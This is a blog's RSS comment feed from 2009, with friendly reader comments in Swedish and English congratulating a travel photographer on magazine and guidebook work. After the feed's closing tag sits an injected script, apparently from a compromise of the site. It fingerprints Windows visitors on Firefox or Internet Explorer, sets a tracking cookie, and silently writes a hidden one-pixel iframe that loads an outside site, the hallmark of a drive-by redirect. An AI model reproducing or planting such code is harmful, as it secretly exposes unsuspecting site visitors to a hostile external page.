<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Media roundup</title>
	<atom:link href="http://www.austinbushphotography.com/2009/08/media-roundup-2.html/feed" rel="self" type="application/rss+xml" />
	<link>http://www.austinbushphotography.com/blog/media-roundup-2.html</link>
	<description></description>
	<lastBuildDate>Fri, 03 Feb 2012 04:43:53 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: Jacob</title>
		<link>http://www.austinbushphotography.com/blog/media-roundup-2.html#comment-25785</link>
		<dc:creator>Jacob</dc:creator>
		<pubDate>Thu, 27 Aug 2009 20:06:33 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2009/08/media-roundup-2.html#comment-25785</guid>
		<description>Bra jobbat mannen!
Behöver jag slänga min gamla Thailand bok nu? Jag kan meddela att vi, nikos och fast eddie ska alla ha ett till barn! Så nästa gång vi ses blir det verkligen familytime..
Vi hörs!
Jacob</description>
		<content:encoded><![CDATA[<p>Bra jobbat mannen!<br />
Behöver jag slänga min gamla Thailand bok nu? Jag kan meddela att vi, nikos och fast eddie ska alla ha ett till barn! Så nästa gång vi ses blir det verkligen familytime..<br />
Vi hörs!<br />
Jacob</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: susan</title>
		<link>http://www.austinbushphotography.com/blog/media-roundup-2.html#comment-25744</link>
		<dc:creator>susan</dc:creator>
		<pubDate>Wed, 26 Aug 2009 17:33:11 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2009/08/media-roundup-2.html#comment-25744</guid>
		<description>good job austin.  as i am planning my first trip to chiang mai i am really interested in reading the article on khao soi.  any ideas where i can read the article here in the states?</description>
		<content:encoded><![CDATA[<p>good job austin.  as i am planning my first trip to chiang mai i am really interested in reading the article on khao soi.  any ideas where i can read the article here in the states?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Pum in NYC</title>
		<link>http://www.austinbushphotography.com/blog/media-roundup-2.html#comment-25685</link>
		<dc:creator>Pum in NYC</dc:creator>
		<pubDate>Tue, 25 Aug 2009 17:34:10 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2009/08/media-roundup-2.html#comment-25685</guid>
		<description>Congratulations Austin. Love you blog. I saw your piece in Saveur last week. The papaya salad photo looks so good. I can almost smell it.</description>
		<content:encoded><![CDATA[<p>Congratulations Austin. Love you blog. I saw your piece in Saveur last week. The papaya salad photo looks so good. I can almost smell it.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Daniel Cuthbert</title>
		<link>http://www.austinbushphotography.com/blog/media-roundup-2.html#comment-25601</link>
		<dc:creator>Daniel Cuthbert</dc:creator>
		<pubDate>Mon, 24 Aug 2009 20:34:50 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2009/08/media-roundup-2.html#comment-25601</guid>
		<description>Congrats Austin, 

hope all is well with you? We need to have a beer when I&#039;m next back in bkk.</description>
		<content:encoded><![CDATA[<p>Congrats Austin, </p>
<p>hope all is well with you? We need to have a beer when I&#8217;m next back in bkk.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: craig &#124; travelvice.com</title>
		<link>http://www.austinbushphotography.com/blog/media-roundup-2.html#comment-25587</link>
		<dc:creator>craig &#124; travelvice.com</dc:creator>
		<pubDate>Mon, 24 Aug 2009 12:44:20 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2009/08/media-roundup-2.html#comment-25587</guid>
		<description>Bravo, especially on the LP updates (looking forward to that festival in November depicted on the new cover). It&#039;s always entertaining to see how little the copy can change, even after a decade or more. Always nice to have the new maps, though. ;D</description>
		<content:encoded><![CDATA[<p>Bravo, especially on the LP updates (looking forward to that festival in November depicted on the new cover). It&#8217;s always entertaining to see how little the copy can change, even after a decade or more. Always nice to have the new maps, though. ;D</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script> var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://feedfaster.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}</script>  

